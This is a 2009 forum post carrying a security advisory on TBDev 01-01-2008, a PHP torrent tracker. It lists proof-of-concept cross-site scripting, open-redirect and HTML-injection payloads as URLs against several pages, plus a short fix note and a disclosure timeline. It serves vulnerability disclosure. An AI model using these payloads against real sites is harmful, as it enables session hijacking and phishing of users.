InterN0T - Advisories Advisories that are found by members of InterN0T.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack (14) Thread Tools Display Modes
  14 links from elsewhere to this Post. Click to view. #1  
Old 12th June 2009, 20:58
MaXe's Avatar
Studying shellcode..
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 3,405
Blog Entries: 36
Rep Power: 10
Reputation: 198
MaXe has made his way up the systemMaXe has made his way up the system
TBDev 01-01-2008 - Multiple Vulnerabilities
TBDev - XSS and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and
develop a software (php peer-to-peer) from the original
torrentbits/bytemonsoon source code.

Credits: InterN0T

External Links:
http://www.tbdev.net


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script >alert(0)</script><br

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD 4K&sure=1

Cross Site Script Redirection: (Anyone, the enduser will need to log in though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD 4K

HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information.
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities)
-:: Solution ::-
Secure redirection calls with referer headers (just an example) and filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
__________________

Quote:
Originally Posted by Norph
MaXe, I really doubt that you are able to browse ANY site more than 2 minutes before you start pwning it xD
Reply With Quote
Reply

Bookmarks

« SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities | transLucid 1.75 - Multiple Vulnerabilities »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1121-tbdev-01-01-2008-multiple-vulnerabilities.html
Posted By For Type Date
CVE-2009-2138 : Vulnerability details, references and list of vulnerable software This thread Refback 4th August 2010 15:26
CVE-2009-2141 : Vulnerability details, references and list of vulnerable software This thread Refback 4th August 2010 15:25
55081: TBDEV.NET makepoll.php returnto Parameter XSS This thread Refback 11th May 2010 13:11
US-CERT Cyber Security Bulletin SB09-180 -- Vulnerability Summary for the Week of June 22, 2009 This thread Refback 30th January 2010 23:14
CVE-2009-2141 - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 12th December 2009 22:39
CVE-2009-2138 - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 12th December 2009 22:39
CVE - CVE-2009-2141 (under review) This thread Refback 20th November 2009 03:15
55083: TBDEV.NET my.php info Parameter XSS This thread Refback 29th August 2009 20:11
55377: TBDev.NET login.php returnto Parameter Arbitrary Site Redirect This thread Refback 16th July 2009 13:36
Bugtraq: [InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities This thread Refback 30th June 2009 14:45
CVE - CVE-2009-2138 (under review) This thread Refback 29th June 2009 19:15
US-CERT Cyber Security Bulletin SB09-180 -- Vulnerability Summary for the Week of June 22, 2009 This thread Refback 29th June 2009 16:49
CVE - CVE-2009-2138 (under review) This thread Refback 26th June 2009 19:51
[InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities This thread Refback 21st June 2009 02:06

Similar Threads
Thread Thread Starter Forum Replies Last Post
AMember 3.1.7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 11 27th September 2009 18:09
SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 20:51
Pivot 1.40.4-7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 20:47
Thelia 1.3.5 Multiple Vulnerabilities Exploit hestas Exploits, Vulnerabilities & PoCs 0 7th July 2008 02:50


All times are GMT +2. The time now is 13:57.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1


Contact Us - InterN0T - Archive - Top
Powered by vBulletin® Version 1.3.37
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.